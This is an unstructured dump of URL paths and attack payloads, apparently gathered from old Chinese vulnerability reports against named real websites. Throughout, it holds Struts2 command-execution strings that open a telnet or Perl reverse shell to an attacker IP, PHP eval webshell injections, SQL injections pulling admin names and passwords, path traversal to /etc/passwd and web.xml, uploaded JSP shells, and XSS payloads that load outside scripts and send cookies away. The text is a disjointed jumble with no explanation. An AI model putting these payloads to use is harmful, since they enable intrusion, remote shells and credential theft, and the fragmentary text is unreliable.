/standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011113031140082&outBizNo=2011113068080882&settleStatus=S&bizIdentity=trade30001&orderId=79fcecb20058c85cecdaae6c7a714802&signData=849f245f8eb4af5744bf6c828a69cdea 
/standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011121292986160&settleStatus=S&errorMsg=&signData=d135f6731821523eec72f34cef143572&merVAR=¬ifyData=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IkdCSyIgc3 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011111650698047&outBizNo=201111162940116&settleStatus=S&bizIdentity=puc10002&orderId=e2f6b9ff378ec02b2abb12e99523fbf9&signData=7930d106a973ba1df40c391055bad916 history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。 /1.html#\ history,就可以看到效果了 history /client/register?aid=register_index110421s /kohlerkitchens/player.php?pid=76,存储型xss地址 /web/userinfo.jsp //www.kndie.com,点击后,URL拦截 /%3C%2F%61%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%61%3E,然后发送出去,再次点击。 /index.php/module/action/param1/$%7B@phpinfo()%7D /xxxxx/xxxx.xml /p/campus/job?postid=7190 /p/campus/job?postid=7190 /nap-front/register/register!checkFilePicture.action?fileId=13977200 /ajax/jQuery/jquery-1.7.2.min.js /utils/API-pack.js /sinaworm.html /sinaworm.html /sinaworm.html /bmiddle/7e7fc78bgw1ds88rpzhefj.jpg","http://ww1.sinaimg.cn/bmiddle/7e7fc78bgw1ds88rpzhefj.jpg /hiwanz /index.php/201205hgktv/weibolottery/publish?callback= content[Math.round pic,atNum:1,filter:[],must:[],url:url},success,failure /group/editphoto.php?group_id=1507&photo_id=66772674 /rongwei/bk.php?id=12挺多库哈 /news/babyplan/info.php?id=19 /article.php?id=33500 /article.php /eSpace/beforelogin/index.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /eSpace/beforelogin/index.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) qrobot.qq.com/index.php/"%20class="red"%20style="Xss:expression(alert('xss')) 
/account/user/findPasswordInit.do?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%20自己的ip地址%208888%20%22%29%27%29%28\u0023rt%20\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /was40/zixun/xilan.jsp?id=3090 /lucky10/index.jsp?from=web2 /lucky10/index.jsp?from=%3CsCrIpt%3Ealert(/xss/)%3C/ScRipT%3E%22%3CsCr%3CscriPt%3EIpt%3Ealert(/xss/)%3C/Sc%3C/script%3ERipT%3E /cases/admin/undoLoginAction.do /speed/a20120410happy/SearchJiFenForiUin.php?iActivityId=61kkk%3Cscript%3Ealert%28/a/%29%3C/script%3E /search/xx%22%3E%3Cscript%3Ealert%28%27a%27%29 /ICBCDynamicSite/Charts/AccGold.aspx?dataType=0&dataId=903&picType=1 /search/noResult.php?qword=%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E /mac/mdata.php?id=../../../../../../../../../../etc/passwd%00.jpg /cgi-bin/sendagift /qzone/gift/CustomGiftViewer.swf /cgi-bin/sendagift?g_tk=399706077 giftid:67081 http://xsst.sinaapp.com/Xss.swf targetuin:48564615 /NewFile.txt /SelfServiceLogin.jsp /servicedetail.jsp?MONTHPAYID=1 /picview?b=idpic&filename=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00.png /include/fckeditor/editor/filemanager/connectors/test.html /include/fckeditor/editor/filemanager/connectors/uploadtest.html /public/upload/tup.jpg/x.php /Order/VSNDetail.asp?ID=29 /subject/adodb/tests/test-datadict.php /tscms/index.php?a=article&aid=34 /index.php?do=view&id=44 /index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D /ztc/index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D 
/index.php/module/action/param1/$%7B@phpinfo()%7D /index.php?r=resume/edit / /techdown.tar /brand.php?brandid=1 /result.asp?sr=1 sgcc.com.cn /index.do /watch_only.php?id=461277 /news.php?id=32947 /register.php?svcid=%22%3E%3Cscript%3Ealert%288608012%29%3B%3C/script%3E&backurl=http://www.tom.com/index.html /register.php?svcid=47&backurl=%22%3E%3Cscript%3Ealert%282329710%29%3B%3C/script%3E /newweb/mp3/mp/ik/600902000001128716/douban.html /p/Searchcompany/industry?id=9&parent_id=1 /p/Searchcompany/industry?id=9&parent_id=1 /WebChatReg/deal/findphone.ashx?phone=13800138000&un=admin%27%20and%201=1-- /WebChatReg/deal/findphone.ashx?phone=13800138000&un=admin%27%20and%201=2-- /caipiao/usercenter.aspx /mensa/js_asp_gb_juankuan_pdp/index001juankuan.asp?formlink=12&liangbiao=PDP /mbti/submit_email_date.asp?user=315813 /spyware/s.asp?name=%B9%E3%B8%E6%B2%E5%BC%FELsmgr /submit/login_sendpass.php /info.jsp?magid=3004202 /authentication.do?appid=5060&busiUrl=http://www.wooyun.org /lushu/swf/.svn/entries /shouji/.svn/entries /lushu/swf/ /lushu/swf/upload.swf /1161579635#!app=2&pos=1338472616 /admin/login.jsp /System/ /tj/subscription /tbox#!javascript:alert(document.cookie) /tbox#!javascript:alert(document.cookie) /user.do?action=updateUserConfig /user.do?action=updateUserConfig expression /music.do?action=toShortUrl /song/1769227691 /tweet.do?action=addTweet /QJ5yOnj /song/1769227691 /music.do?action=toShortUrl /song/2068536 /QJ5yOnj /tweet.do?action=addTweet /QJ5yOnj /.svn/entries /.svn/entries /pic/.svn/entries /book/.svn/entries /music/.svn/entries /new/.svn/entries /sogou/map/.svn/entries /sogou/.svn/entries /detail.php?id=461553 /admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20order%20by%204%23 /admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20and%201=1%23 /admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20and%201=2%23 /business/dooland/admin/index.mx /adclickrate/jsp/admin/generateTinyURL.jsp /search.do里。。。 /phpinfo.php /db/quanjude/ /framework_gb/Web/UI/ /help.php 
/1.php /1.txt /spaceinterface/ /log/ /aspnet_client/system_web/ /MyShareInfo/ /spaceinterface/xmlConfig/SSOConfig.xml /spaceinterface/xmlConfig/UDRouterServerConfig.xml /spaceinterface/xmlConfig/UmsApiConfig.xml /red/ldjc.php?class_id=66 /support/Channel_Home/ /Downloads/Channel_Home/Download_Driver.asp?Content_ID=2967'%20and%20@@version%3E1-- /Downloads/Channel_Home/Download_Driver.asp?Content_ID=2967'%20and%20user%3E0-- /Downloads/Channel_Home/Download_Driver.asp?Content_ID=2967'%20and%20host_name()=0-- /Downloads/Channel_Home/Download_Driver.asp?Content_ID=2967'%20and%20@@servername%3E0-- /m/index.php?c=post&m=index&id=2680 /spywars/login.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20perl%20\u002ftmp\u002fspider\u005fbc%20183.20.164.224%2012345%20%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /service/service_login.jsp?retUrl=%2Fwelcome%2FthirdPage.jsp /Recommend.php?editor=20 /bbs/list.php?bid=1 /recommend_product.php?category_id=5 / /loginBySystemAction.do?employeeId=C22606&key=sAAlbfHqQtY= /musicdoer/index.php/module/action/param1/$%7B@phpinfo()%7D /musicdoer/index.php/module/action/param1/${@eval%28$_POST[f]%29 /index.php/Count/index?id=16412 /recommend_product.php?category_id=6 /gainover#!javascript:alert(document.cookie) /{你的ID}/photos)打开调试工具,查看刚上传的图片。 /pid{我们的代码}.jpg /upload/photo xsst.sinaapp.com/m.js /2818517120/albums/detail/album_id/3452856527901069 /2818517120/photos/detail/photo_id/3452864928806857 / / /beijing/tabid/838/ctl/Admin/mid/1807/Default.aspx /positionDetail.shtml?id=111111111111111111111111 /favoman/Favoman/index?token=eaDnEdv6eOcxvVxIYG[马赛克]bmOXRTCl2RblsfEHRF5Yp7v4iXXJQ6ZrFhQ%3D%3D&vcode=05e5[马赛克]9c /widget?vid=1772503 /widget?vid=1764421页面的输出内容。 /create?tab=pic 
/widget?vid=1772503 //zf.xxx.com/(dqsrik2stu2ogv55amzxx5ua)/Default2.aspx。这个时候我将这个url发给别人,只要别人登录了,例如登录后:http://zf.scetop.com/(dqsrik2stu2ogv55amzxx5ua)/xs_main.aspx?xh=1001100111,我们访问这个地址,就可以绕过登录了。但是前提需要知道对方学好,将xh参数改成对方学号。所以危害比较小,只能作为一个漏洞示例。 /)存在注入点,好多,不止一个,随便找了个http://220.191.192.87/showNews!goSupportpage.action?showNewsDomain.newsid=209,可导出用户数据 /pub/FDI/zcfg/zcfg2/default.jsp?type=51 /pub/FDI_EN/Laws/default.jsp?type=530 /pub/FDI_EN/chunnel/tztdTwo.jsp?shengfen=2 /pub/FDI_EN/Laws/Laws2/default_anli.jsp?type=2706 /pub/FDI/zcfg/law_ch_info.jsp?docid=75041 /pub/FDI/chunnel/tztdTwo.jsp?shengfen= /pub/FDI/tzjh/gxjscpxmtj/gjdyth/default.jsp?type=3 /pub/FDI/tzjh/gxjscpxmtj/kjyhy/default.jsp?type=1 /pub/FDI/tzjh/gxjscpxmtj/rj/default.jsp?type=5 /pub/FDI/tzjh/gxjscpxmtj/xcl/default.jsp?type=7 /pub/FDI/tzjh/Page/lahuaNewInfo.jsp?id= /pub/FDI/wztj/wstztj/wstztjjs/default.jsp?key= /pub/FDI_EN/Opportunities/HightecProjectPromotion/GeospaceandOcean/default.jsp?type=1 /pub/FDI_EN/Opportunities/HightecProjectPromotion/Optical-ElectromechanicalIntegration/default.jsp?type=3 /pub/FDI_EN/Opportunities/HightecProjectPromotion/Software/default.jsp?type=5 /pub/FDI_EN/chunnel/Page/info.jsp?id=200802130040546 /pub/FDI/chunnel/Page/info_en.jsp?id=200802130040546 /pub/FDI/qycx/qycx_ch/infoResultNew.jsp Data1=12345678&Data2=12345678&Data3=12345678&Data4=12345678&txtCompName=12345678&SelCon=12345678&SelCompType=12345678&SelCompActuality=12345678&radiobutton=1 /blog/api/artpost.php /ads/index.asp /ads/ /ads/work/temp/ /manager/domain/cer.asp?domainid=346355 /manager/domain/cer.asp?domainid=346320 /showinfoservlet?id=1666 /yhdkjbxxsearchservlet?zgbh=62537968 /login.aspx /tasklist?wd=%22%20onmouseover=javascript:alert(document.cookie)%3E%BD%CC%D3%FD /tasklist?wd= /tasklist?wd=%22%3E%BD%CC%D3%FD%3Cscript%20src=http://tmxk.org/q.js%3E%3C/script%3E /books/33 /books/33 /books /2012/detail.php?fup=44&fid=48 /utsidakang/index.php?_c=utsidakang&_a=userAdd&type=login&callback=callba 
/gate/big5/miniactive.ifeng.com/huadi/index.php?_a=oneData&callback= /dayi/index.php?_a=oneData&callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /special/yingguodaxuan/data.php?callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /poll.php?format=js&callback=pollback&surveyId=%3Cscript%3Ealert(/valo/)%3C/script%3E /stock/longhubang/gsdzz_ajax.php?callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /rank_data.php?country=1&callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /info/testdrive.php?callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /api/fashion_index_pms_api.php?callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /CaiBeiConnect/forward.php?mall_id=10154&to_url=http://www.baidu.com /data/mail/show.php?id=11667 /data/mail/120/ /twns/login.jsf /upload/pop1.jsp /upload/images/temp/2012552131381371.jsp /upload/images/temp/2012552131381372.jsp http://www.zca.gov.cn/index.action /pic/6f81831bhc1b7f66073a7& /bmiddle/6f81831bhc1b7f66073a7 /pxrenren.js'" /pxrenren.js'" /pxrenren.js'" /pxrenren.js';document.body['appe'+'ndChild'](s)" /pxrenren.js';document.body['appe'+'ndChild'](window.s)" /pxrenren.js http://tiantiango.cn/download.action /gdqueyue/xml/config.xml /act/a20110323server/log/20120104.txt /toupiao/detail.php?id=54 //index.php/module/aciton/param1/${@phpinfo() /cesu/help_explain.php?id=27 /roll/20111231/081511108998.shtml /chanjing/cyxw/20120116/095711210900.shtml By:301 /blackberry/content.php?id=1 ?no= /Hot_Discuss.aspx?Name= /zjzx/?type=list&cq=%22%3E%3Cscript%3Ealert%280604795%29%3B%3C/script%3E /huodong/yspx/medal_team.php?id=326 /huodong/yspx/medal_team.php?id=326 /help_search.php?keyword=1&kindid=3 /test.php /admin/login.php /images/sohuhelp.gif/sohu.php,gif文件解析为php。 /help_3.php?kindid=%22/%3E%3Cscript%3Ealert%28/sohu/%29%3C/script%3E&pageno=2 /cgi-bin/nw/main.cgi?id=328 /cgi-bin/nw/main.cgi?id=328 /show.php?id=862 /game/yl/index.html?zixun.110.com /5107/upload/screenImagesSave.php?filename=jpg.php /xxx.php / / / 
/dedecms%E5%87%A0%E4%B8%AA%E6%9C%80%E6%96%B0bug%E5%88%86%E6%9E%90/ /app/Runtime/Logs/日期.log(如http://www.tgwok.com/app/Runtime/Logs/12_06_05.log)将有明文显示出涉密信息,导致敏感信息泄漏。出现此种情况的还有比比团团购网www.b1b8.com。 /sites/main/preview/ldgg_preview.htm?tid=50195 /看文章时,浏览器默认禁用javascript /md/pinglun.la.js /comment_box/plugin/get_comments?url=".urlencode / /md/pinglun.la.js /wp-content/plugins/pinglunla/readme.txt /wp-content/plugins/pinglunla/comments.php /wp-content/plugins/pinglunla/sinaweibo/ /wp-content/plugins/pinglunla/readme.txt /plugin/pinglunla.zip /所有评论都有xss。 /commentReply/comdetail?sid=314imc&commentid=82453 alert(document.cookie) /c/chat /notebook/jsb_exportData.php?&sort=1 http://web.im.baidu.com/message /flashgames/score.php?g=urn:uuid:a89bf012-ef00-30a1-8816-27eec49e5978&s=5 / /cgi-bin/club/login.cgi /cgi-bin/club/login.cgi /gq_free_detail.php?id=-340000 /index.php /的几处XSS alert(1),那么问题就来了。 alert(1) alert(1)。 web.qq.com /swf/FileUploader.swf) /swf/FileUploader.swf?callback= /swf/FileUploader.swf?callback= xsst.sinaapp.com/'%2bw%2b'.js' /webqqbg.php代码如下 /webqqbg.php.txt /webqqbg.php页面里的代码,会调用jq.js和wq.js /getvfqq.php?cookie="+encodeURIComponent(document.cookie) /getvfqq.php /webqqbg.php /getvfqq.php.txt /keycgi/qqweb/newuac/set.do /webqqbg.php /getvfqq.php /keycgi/qqweb/newuac/set.do发送主题数据 /webqqbg.php /cgi-bin/music/album/main.cgi?id=10227 /cgi-bin/music/album/main.cgi?id=10227 /tempuser1334906450?s=%22+onmouseover%3Djavascript%3Aalert%28document.cookie%29%3E / /passport/admin/member_detail.php?domain=5&id=823444 /passport/admin/member_detail.php?domain=5&id=500%20and%201=2%20UNION%20SELECT%20database(),user(),3,4,version(),6,7,8,9,10,11,12,13,14,15 /cgi-bin/column/content.cgi?main=2760&cat=2769&id=478354 /fckeditor/ /cgi-bin/team/main.cgi?id=26 /cgi-bin/team/main.cgi?id=26 absolute;left:10000px;top:10000px /exploits/18329/ /cgi-bin/subindex.cgi?id=259 www.jstzrcb.com site:focus.cn /vote/developer_intro.php?ID=1548 /vote/developer_intro.php?ID=90 
/vote/developer_intro.php?ID=236 /vote/developer_intro.php?ID=59 /cgi-bin/nw/main.cgi?id=136 /cgi-bin/nw/main.cgi?id=104 /star/movie.php?id=2185 SELECT SELECT SELECT SELECT SELECT /star/movie.php?id=2185%201=2 SELECT SELECT SELECT SELECT SELECT SELECT /star/new.php?id=2976 SELECT /star/new.php?id=2976%20SELECT%20content%20FROM%20star_intro%20WHERE%20id=2971 /star/pic.php?id=540%E2%80%99 SELECT SELECT SELECT SELECT SELECT SELECT www.easybuy.com.cn www.icinfo.net.cn /yuejuan5/qq_gxqm?qm_num=3&content=%e5%b8%ae%e6%82%a8%e8%a7%a3%e5%86%b3%e4%b8%80%e5%88%87%e7%bd%91%e7%bb%9c%e9%97%ae%e9%a2%98%ef%bc%8c%e8%81%94%e7%b3%bb_%e7%ba%a2%e9%85%92%e7%8b%ac%e9%86%89+Qq_429590191+-+www.xjquc.com&isajax=1&_=1339136194456 /traffic/ /manage http://its.map.baidu.com:8002/admin /passport/admin/member_detail.php?domain=5&id=823444 /passport/admin/member_detail.php?domain=5&id=500%20and%201=2%20UNION%20SELECT%20database(),user(),3,4,version(),6,7,8,9,10,11,12,13,14,15 /WEB-INF/classes/ /WEB-INF/classes/dbConfig.properties120327 /preview?mid=1tbikRbGMUX9hA42zAAAs4&part=3&sign=f784871b12b1baf45a540659bacfeb99&time=1339077192&uid=zhuoran_li%40126.com /pub/weather/WeatherCity.aspx?FPY=D%3C/span%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E%3Cspan%3E&ModelName=Weather / /searchTech.php?so=magic%20ball%202%202.2&sidtech=0&ssidtech=0&cd=1&softId=0&p=37 /mwin/infomgt/publish/publishDetails!show.action /jseea_query/input.do?catlog=1&database=21%2Cdb_169 /member-0000001-modifyReceiver.html /member-0000002-modifyReceiver.html /download.jsp?path=UserFiles/File/%A1%B6%B8%A3%BD%A8%CA%A1%B9%AB%B0%B2%CC%FC%B9%D8%D3%DA%D3%A1%B7%A2%A1%B4%B8%A3%BD%A8%CA%A1%B9%AB%B0%B2%CC%FC%D5%FE%B8%AE%D0%C5%CF%A2%B9%AB%BF%AA%B9%A4%D7%F7%D4%DD%D0%D0%B9%E6%B6%A8%A1%B5%B5%C4%CD%A8%D6%AA%A1%B7%B5%C4%B8%BD%BC%FE20080530044951.doc /Description.action / /Manage/fckeditor/editor/filemanager/connectors/test.html /download.jsp?path=/UserFiles/File/20111118091214.doc /download.jsp?path=/UserFiles/../download.jsp /manager/html 
include include mm:ss /upload.do?realPath=/UserFiles/Image/&limit=0&hold=1 mm:ss /UserFiles/Image/shell.jsp(我选择上传的文件名是 /delMoreFile.do?realPath=/UserFiles/Image/&filename=shell.jsp¬Select=1 /admin/admin.jsp /accountForward.do?submitType=add /admin/admin.jsp /html/6/3/47864_201268428_1.html /templates/download.jsp?path=/UserFiles/File/20120529015133.zip /templates/download.jsp?path=/UserFiles/../WEB-INF/web.xml /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /templates/download.jsp?path=/UserFiles/../admin/template/uploadFile.jsp /uploadFile.do?realPath=/UserFiles/&limit=0&hold=1 /uploadFile.do?realPath=/UserFiles/test.jsp%00会怎样?当然希望是00截断了 /UserFiles/test.jsp(留下shell证明来过) / /?question/ajaxsearch/123%27union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19%20from%20ask_user%23%27% /robots.txt/1.php /news/view.php?id=8312 /web/topic/topic_content.php?id=435869 /web/topic/interface/publish.php?act=add /wangDian.html /wangDian.html /wangDian.html /index.php?classchg=&cnt=0&curpage=1&filterattr=4%7C6&filterstype=2%7C2&filtervalue=11%7C2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&orderby=F19%20desc&pagenum=20&site=digi&subcategory=%26%23191%3B%26%23213%3B%26%23181%3B%C2%A1%C3%82&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data /index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc 
/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector /events.php?do=view&id=162 /news.php?do=rel_view&id=5267 /news.php?do=rel_view&id=5267 / /WorkInfo.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /xiazai/front.php/software/software_c/index /xiazai/front.php/game/game_list_c/get_autocomplete_words?t=0.007178842930616547&s=qq /xiazai/front.php/game/game_list_c/show_index_now/53a 360.cn /upload.html /index.php?c=insert&a=doedit none"b=".rar|help_7f7b1b4ef061be3a.rar /bdpf/home/user/LosePWAction.do alert(/ie6/) url(http://tb1.bdstatic.com);xss:expression / /challenge/grouptab/loadlog?id=940 /challenge/grouptab/loadlog?id=940%20and%201=2%20union%20select%201,2,user%28%29,4,5,6,7,8,9,0,1,2,3-- /challenge/grouptab/loadlog?id=940%20and%201=2%20union%20select%201,2,3,load_file%280x2F6574632F706173737764%29,5,6,7,8,9,0,1,2,3-- /userinfo.php?id=554 /php/helper/ptool/hf_query/get_hf_info?gid=xxz&cid=74&area=102205&uin=1111%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /view/2f420bc258f5f61fb73666a8.html /images/jtsp.jsp?sort=-2&downfile=C:\Tomcat+5.0\webapps\tomcat-example\diydo.jsp /alibaba-message-Auth/alibabaAuth/alibabaloginAuthSession/login.html /--%3e%3cimg%20src%3dx%20Onerror%3dalert('wooyun')%3e /about/--%3e%3cimg%20src%3dx%20Onerror%3dalert('wooyun')%3e /list/--%3e%3cimg%20src%3dx%20Onerror%3dalert('wooyun')%3e 
/index.php?act=help.index&type=../../../../../../../../../../etc/passwd%00.jpg /guide/topics/data/data-storage.html#filesExternal /cgi-bin/team/show.cgi?id=521 /resin-doc/viewfile/?file=index.jsp alert write write write tmxk.org/q.js write /q.js write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62)) /index.php?app=home&mod=Public&act=tags_result&tag=%58%53%53%C2%A9%B6%B4%DF%E3%A3%BF //css/.svn/entries?COLLCC=1051966005& / /views/contents/common/download.jsp?filename=/upload/FileUploadback/HR_BULLETIN/20120120145058.doc / /net/bgxz/diy.asp /BeidaPass/login.jsp账号密码均为admin /manager/html /.svn/entries /.svn/text-base/bindPassport.php.svn-base www.hkstv.hk 1.9.2.28 write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62)) /chrome.html /.svn/entries /.buildpath /controller/.svn/entries /config/.svn/entries /.svn/text-base/index.php.svn-base /web/welcome/login?fromu=http%3A%2F%2Ftongji.baidu.com%2Fweb%2Foverview%2Findex&e=%D3%C3%BB%A7%3Cimg%20src=%221%22%20onerror=%22alert%28document.cookie%29%22%20/%3E%C3%FB%BB%F2%C3%DC%C2%EB%B4%ED%CE%F3&un=dddddd&aid=12&errno=132 /ddedu/website/index.jsp /recruitment/?id=2 / /ScoreReport.aspx?i=NTU1NQ== /ScoreReport.aspx?i=NTU1NQ== /.svn/text-base/admin.php.svn-base alert(document.cookie) /.svn/entries /.svn/text-base/group.php.svn-base /.svn/text-base/hotwords_report_thanks.jsp.svn-base /.svn/entries /.svn/entries /.svn/text-base/delete.php.svn-base /tclm/xxcx/wyzpbm.jsp?ucode=2145&&zpcode=151704 /detail.php?id=966 newsdisp.php?aid= /manager/status www.monternet.com hao.360.cn/i/index.html里存有该key,而hao.360.cn/i/index.html里存在着致命的一句 /iefix.php none swf app.baidu.com /static/12161058/appweb/flash/APPProxy.swf /static/12161058/appweb/flash/APPProxy.swf?logHandler= 
/rcookie.php?cookie%3d\'%2bencodeURIComponent(document.cookie);window.x=1 /static/12161058/appweb/flash/APPProxy.swf?logHandler= /rcookie.php?cookie%3d\'%2bencodeURIComponent(document.cookie)%2b\'%26refer%3d=\'%2bencodeURIComponent(location.href);window.x=1 /static/12161058/appweb/flash/APPProxy.swf?logHandler= /2011/0905/1315207969664.jpg/1.php /static/image/common/logo.png/1.php /continuum/workingCopy.action?projectId=221&projectName=&userDirectory=project&file=test.txt /continuum/buildResult.action?projectId=246&projectName=&buildId=22533&projectGroupId=0 /images/uploader.swf?jsobject=function%28%29{alert%280%29}%28%29 /web/welcome/ico?s=1,基于时间的注入。 /findpwd/setpwdfromemail?vc=c4ce4dd3d566ef83f9[马赛克]&u=[马赛克]%40gmail.com,马上重设密码! /resume_edu.php?eduid=144943 /resume_exp.php?expid=178735 /resume_training.php?id=59730 /user_action.php?_action=edu_del&id=144943 /user_action.php?_action=exp_del&id=178735 /user_action.php?_action=train_del&id=59730 /taobao-themes-bug/ /s?wd=xls%20%E8%BA%AB%E4%BB%BD%E8%AF%81%E5%8F%B7%203&pn=10&ie=utf-8&rsv_page=1 /s?ie=utf-8&bs=xls+%E5%8C%BB%E9%99%A2&f=8&rsv_bp=1&wd=xls+%E5%8C%BB%E9%99%A2+%E8%BA%AB%E4%BB%BD%E8%AF%81&inputT=2140 /Xjs.swf#.gif /tb/flash/vote.swf?r=166486139965bce7156bc36762bb2c3edf&voteId=0e1e9a0f95d922fc978c0adf&tn=ajaxCanVote&stamp=1339767810003 /tieba.htm)。 /tb/flash/vote.swf?r=166486139965bce7156bc36762bb2c3edf&voteId=0e1e9a0f95d922fc978c0adf&tn=ajaxCanVote&stamp=1339767810003 /vote/commit/add_vote?alt=json /dc/common/tbs?t=0.7085538243409246 /f/commit/vote/add /vote/commit/add_vote_relation?alt=json 100%;height:150px /vote/commit/add_vote?alt=json /Xjs.swf#1.gif /forum/pic/item/b9d3efb1c21a60589a50274f.jpg /forum/pic/item/b9d3efb1c21a60589a50274f.jpg /dc/common/tbs?t="+Math.random(),function(rs) /f/commit/vote/add /vote/commit/add_vote_relation?alt=json /newsecond/ /?mod=details&id=43167 
/certificate.id/certificateb.php?id=20021329+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 /certificate.id/certificateb.php?id=20021329+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28admin_u.name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60ectrust%60.admin_u+where+id%3D1+Order+by+name+limit+0%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 /certificate.id/certificateb.php?id=20021329+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28admin_u.password+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60ectrust%60.admin_u+where+id%3D1+Order+by+name+limit+0%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 /certificate.id/certificateb.php?id=20021329 /file/downLoad?filename=../../WEB-INF/web.xml /download.jsp?path=download.jsp /supervision/test.asp /item/download.jsp?file_path=/item/file/%B9%A9%D3%A6%C9%CC%CC%E1%C7%B0%BD%E1%BF%EE%C9%EA%C7%EB%B1%ED.xls /Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN /Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN’ cs:558 /Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%String_Col%%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%20%271%27=%271 cs:558 /v/video_list.php?class=6%20and%201=2%20union%20select%201,2,3,4,5,6,7&channel= 
